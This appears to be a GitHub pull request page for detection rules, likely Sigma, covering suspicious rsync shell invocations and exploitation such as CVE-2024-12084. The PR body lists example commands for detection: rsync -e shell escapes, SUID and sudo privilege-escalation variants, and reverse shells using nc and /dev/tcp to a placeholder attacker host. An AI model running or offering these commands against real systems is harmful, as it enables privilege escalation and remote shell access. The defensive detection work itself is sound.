Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Rsync exploitation #5163

Merged
merged 9 commits into from
Jan 19, 2025
Merged

Rsync exploitation #5163

merged 9 commits into from
Jan 19, 2025

Conversation

Neo23x0
Copy link
Collaborator

@Neo23x0 Neo23x0 commented Jan 18, 2025

Summary of the Pull Request

I reworked the rule for suspicious rsync invocations and added a new one that is supposed to detect rsync exploitations in a generic way (e.g. CVE-2024-12084 https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/ ). Since it's more a generic rule than a specific detection for an exploitation of CVE-2024-12084 I decided to not add it to the emerging-threats rule set but add it to the standard set.

The old rule for suspicious rsync invocations with the -e flag had a wrong description and far too specific strings in the selection. I wonder if this ever matched anywhere. I composed a list of examples so that everyone can understand why the previous values were too specific and show the variety of way in which such a command could be written.

Changelog

new: suspicious shell invocation via rsync without the -e flag
update: made the far too narrow existing rsync rule more generic

Example Log Event

Examples for rsync invocations

# Basic Shell Escapes
rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e 'bash -c "bash 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/bash -i' 127.0.0.1:/dev/null
rsync -e 'dash -c "dash 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/dash -i' 127.0.0.1:/dev/null
rsync -e 'zsh -c "zsh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/zsh -i' 127.0.0.1:/dev/null
rsync -e 'ksh -c "ksh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/ksh -i' 127.0.0.1:/dev/null
rsync -e 'busybox sh' 127.0.0.1:/dev/null
rsync -e 'busybox ash' 127.0.0.1:/dev/null
rsync -e 'fish -c "fish 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/usr/bin/fish -i' 127.0.0.1:/dev/null

# Abusing SUID with Different Shells
./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
./rsync -e 'bash -p -c "bash 0<&2 1>&2"' 127.0.0.1:/dev/null
./rsync -e 'zsh -p -c "zsh 0<&2 1>&2"' 127.0.0.1:/dev/null
./rsync -e 'ksh -p -c "ksh 0<&2 1>&2"' 127.0.0.1:/dev/null

# Abusing Sudo Permissions
sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo rsync -e 'bash -c "bash 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo rsync -e 'zsh -c "zsh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo rsync -e 'sh -c "/bin/sh 0<&2 1>&2"' 127.0.0.1:/dev/null

# Using Netcat for Reverse Shells
rsync -e 'sh -c "nc -e /bin/sh attacker-ip attacker-port"' 127.0.0.1:/dev/null
rsync -e 'bash -c "bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1"' 127.0.0.1:/dev/null
rsync -e 'zsh -c "zsh -i >& /dev/tcp/attacker-ip/attacker-port 0>&1"' 127.0.0.1:/dev/null

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

@github-actions github-actions bot added Rules Linux Pull request add/update linux related rules labels Jan 18, 2025
@nasbench nasbench merged commit 06a5d08 into master Jan 19, 2025
23 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@nasbench nasbench nasbench approved these changes

Assignees
No one assigned
Labels
Linux Pull request add/update linux related rules Rules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@Neo23x0 @nasbench